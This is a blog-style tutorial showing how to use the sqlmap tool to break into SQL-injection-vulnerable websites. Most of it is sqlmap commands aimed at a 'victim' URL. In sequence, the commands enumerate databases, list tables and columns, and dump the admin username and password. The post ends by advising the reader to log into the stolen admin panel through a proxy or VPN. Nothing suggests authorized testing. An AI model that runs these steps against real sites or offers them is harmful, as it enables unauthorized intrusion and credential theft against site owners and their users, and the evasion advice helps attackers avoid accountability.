Menu
 

Hey every one now i am back again to backtrack with a classic website hacking technique using a tool know as SQL MAP.
So you can check all my tutorial on backtrack here if you are a new visitor.
So come to today's topic Sqlmap is a automatic sql injection tool which helps you to hack vulnerable website easily.
Now to know more on it must have some idea on sql injection .

Now Follow these simple steps to know effective use of this tool
.


  • Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
    sql map
  • Now you have to find a sqli vulnerable site.i have one lets use it.
    sql map

  • Now type this command in the terminal and hit enter.(see in image)

    python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

  • Here it is two database name of the website but in this case we will choose AJ Database.
    sql map tutorial
  • Now our task is to get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

    python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables

    So in this case the command will be
    python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

    sql map tutorial
  • Now you will get the tables list which is stored in aj database.

    sql map tutorial
  • Now lets grab the columns from the admin table(type following command)
    python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

    sql map tutorial
    Now we got the columns and we got username and password
  • So finally lets grab the passwords of the admin :).
    python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

    Now we have the username and the password of the website !
    sql map tutorial

    Now All you have to do is just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

    Thanks For Reading Stay Tuned for many such tutorials :)
  • Post a Comment

    Post a Comment

    Feel Free To Ask Your Query we Love To Answer

     
    Top